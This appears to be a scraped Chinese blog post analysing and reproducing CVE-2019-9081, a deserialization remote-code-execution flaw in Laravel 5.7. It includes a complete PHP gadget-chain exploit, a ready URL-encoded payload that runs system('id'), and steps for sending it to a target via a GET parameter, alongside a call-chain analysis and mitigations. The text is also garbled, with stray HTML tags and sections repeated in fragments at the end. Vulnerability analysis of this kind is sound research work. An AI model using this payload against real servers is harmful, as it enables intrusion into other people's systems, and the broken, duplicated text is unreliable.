Laravel反序列化漏洞CVE-2019-9081分析与复现<\/h1>

漏洞概述<\/h2>
CVE-2019-9081是Laravel Framework 5.7.x版本中Illuminate组件存在的一个反序列化漏洞，远程攻击者可利用该漏洞执行任意代码。<\/p>

环境准备<\/h2>

系统要求<\/h3>

PHP版本 >= 7.1.3（推荐PHP 7.2）<\/li>

Laravel 5.7.x<\/li> <\/ul>

环境配置（Ubuntu示例）<\/h3>

# 禁用Apache中的PHP7.0<\/span>
<\/span><\/span>sudo a2dismod php7.0
<\/span><\/span>
<\/span><\/span># 启用PHP7.2<\/span>
<\/span><\/span>sudo a2enmod php7.2
<\/span><\/span>
<\/span><\/span># 重启Apache<\/span>
<\/span><\/span>sudo systemctl restart apache2.service
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
漏洞位置<\/h3>
漏洞出现在Illuminate\Foundation\Testing\PendingCommand.php<\/code>文件中，其__destruct()<\/code>方法中调用了run()<\/code>函数来执行命令。<\/p>
漏洞利用原理<\/h3>
通过反序列化该类的实例对象来调用run<\/code>方法执行命令，达到RCE的效果。<\/p>
漏洞利用链分析<\/h2>
关键类说明<\/h3>

PendingCommand<\/strong>：包含可执行命令的run()<\/code>方法<\/li>
GenericUser<\/strong>：用于绕过属性检查<\/li>
Application<\/strong>：用于控制依赖注入容器<\/li>
<\/ol>
利用链构造<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Illuminate\Foundation\Testing<\/span> {
<\/span><\/span>    class<\/span> PendingCommand<\/span> {
<\/span><\/span>        protected<\/span> $command;
<\/span><\/span>        protected<\/span> $parameters;
<\/span><\/span>        protected<\/span> $app;
<\/span><\/span>        public<\/span> $test;
<\/span><\/span>        
<\/span><\/span>        public<\/span> function<\/span> __construct($command, $parameters, $class, $app){
<\/span><\/span>            $this-><\/span>command<\/span> =<\/span> $command;
<\/span><\/span>            $this-><\/span>parameters<\/span> =<\/span> $parameters;
<\/span><\/span>            $this-><\/span>test<\/span> =<\/span> $class;
<\/span><\/span>            $this-><\/span>app<\/span> =<\/span> $app;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Auth<\/span> {
<\/span><\/span>    class<\/span> GenericUser<\/span> {
<\/span><\/span>        protected<\/span> $attributes;
<\/span><\/span>        
<\/span><\/span>        public<\/span> function<\/span> __construct(array<\/span> $attributes){
<\/span><\/span>            $this-><\/span>attributes<\/span> =<\/span> $attributes;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Foundation<\/span> {
<\/span><\/span>    class<\/span> Application<\/span> {
<\/span><\/span>        protected<\/span> $hasBeenBootstrapped =<\/span> false<\/span>;
<\/span><\/span>        protected<\/span> $bindings;
<\/span><\/span>        
<\/span><\/span>        public<\/span> function<\/span> __construct($bind){
<\/span><\/span>            $this-><\/span>bindings<\/span> =<\/span> $bind;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $genericuser =<\/span> new<\/span> Illuminate\Auth\GenericUser<\/span>(array<\/span>(
<\/span><\/span>        "expectedOutput"<\/span> =><\/span> array<\/span>("0"<\/span> =><\/span> "1"<\/span>),
<\/span><\/span>        "expectedQuestions"<\/span> =><\/span> array<\/span>("0"<\/span> =><\/span> "1"<\/span>)
<\/span><\/span>    ));
<\/span><\/span>    
<\/span><\/span>    $application =<\/span> new<\/span> Illuminate\Foundation\Application<\/span>(array<\/span>(
<\/span><\/span>        "Illuminate\Contracts\Console\Kernel"<\/span> =><\/span> array<\/span>(
<\/span><\/span>            "concrete"<\/span> =><\/span> "Illuminate\Foundation\Application"<\/span>
<\/span><\/span>        )
<\/span><\/span>    ));
<\/span><\/span>    
<\/span><\/span>    $pendingcommand =<\/span> new<\/span> Illuminate\Foundation\Testing\PendingCommand<\/span>(
<\/span><\/span>        "system"<\/span>, array<\/span>('id'<\/span>), $genericuser, $application
<\/span><\/span>    );
<\/span><\/span>    
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>($pendingcommand));
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>关键点解析<\/h3>


PendingCommand构造参数<\/strong>：<\/p>

$command<\/code>：要执行的命令（如"system"）<\/li>
$parameters<\/code>：命令参数（如array('id')）<\/li>
$class<\/code>：GenericUser实例<\/li>
$app<\/code>：Application实例<\/li>
<\/ul>
<\/li>

GenericUser的作用<\/strong>：<\/p>

提供expectedOutput<\/code>和expectedQuestions<\/code>属性<\/li>
当访问不存在的属性时触发__get()<\/code>魔术方法<\/li>
绕过mockConsoleOutput()<\/code>方法中的属性检查<\/li>
<\/ul>
<\/li>

Application的作用<\/strong>：<\/p>

控制$bindings<\/code>属性<\/li>
使$this->app[Kernel::class]<\/code>返回Application对象<\/li>
最终触发call_user_func_array()<\/code>执行命令<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现步骤<\/h2>


生成Payload：<\/p>

执行上述EXP代码生成序列化字符串<\/li>
对结果进行URL编码<\/li>
<\/ul>
<\/li>

触发漏洞：<\/p>

通过GET参数传递序列化数据<\/li>
示例URL：http:\/\/target\/index.php?code=[生成的payload]<\/code><\/li>
<\/ul>
<\/li>

典型Payload示例：<\/p>
<\/li>
<\/ol>
O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22id%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D
<\/code><\/pre>
技术细节分析<\/h2>
反序列化流程<\/h3>

unserialize()<\/code>触发__destruct()<\/code><\/li>
调用PendingCommand<\/code>的run()<\/code>方法<\/li>
run()<\/code>调用mockConsoleOutput()<\/code><\/li>
通过GenericUser<\/code>绕过属性检查<\/li>
最终执行call_user_func_array()<\/code>实现RCE<\/li>
<\/ol>
关键函数调用链<\/h3>

PendingCommand::__destruct()<\/code><\/li>
PendingCommand::run()<\/code><\/li>
PendingCommand::mockConsoleOutput()<\/code><\/li>
Application::make()<\/code><\/li>
Container::call()<\/code><\/li>
call_user_func_array()<\/code><\/li>
<\/ol>
防御措施<\/h2>

升级到Laravel安全版本<\/li>
避免反序列化用户可控的数据<\/li>
使用白名单验证反序列化的类<\/li>
实现__wakeup()<\/code>或__destruct()<\/code>方法的安全检查<\/li>
<\/ol>
参考资源<\/h2>

Laravel v5.7反序列化RCE分析<\/a><\/li>
Laravel服务容器深度解析<\/a><\/li>
Laravel 5.7官方文档<\/li>
PHP自动加载机制解析<\/li>
<\/ol>

Laravel反序列化漏洞CVE-2019-9081分析与复现<\/h1>

漏洞概述<\/h2> CVE-2019-9081是Laravel Framework 5.7.x版本中Illuminate组件存在的一个反序列化漏洞，远程攻击者可利用该漏洞执行任意代码。<\/p>

环境准备<\/h2>

漏洞分析<\/h2>

漏洞位置<\/h3> 漏洞出现在Illuminate\Foundation\Testing\PendingCommand.php<\/code>文件中，其__destruct()<\/code>方法中调用了run()<\/code>函数来执行命令。<\/p>

技术细节分析<\/h2>

参考资源<\/h2> Laravel v5.7反序列化RCE分析<\/a><\/li> Laravel服务容器深度解析<\/a><\/li> Laravel 5.7官方文档<\/li> PHP自动加载机制解析<\/li> <\/ol>

漏洞概述<\/h2>
CVE-2019-9081是Laravel Framework 5.7.x版本中Illuminate组件存在的一个反序列化漏洞，远程攻击者可利用该漏洞执行任意代码。<\/p>

漏洞位置<\/h3>
漏洞出现在`Illuminate\Foundation\Testing\PendingCommand.php<\/code>文件中，其__destruct()<\/code>方法中调用了run()<\/code>函数来执行命令。<\/p>`

参考资源<\/h2>

Laravel v5.7反序列化RCE分析<\/a><\/li>
Laravel服务容器深度解析<\/a><\/li>
Laravel 5.7官方文档<\/li>
PHP自动加载机制解析<\/li> <\/ol>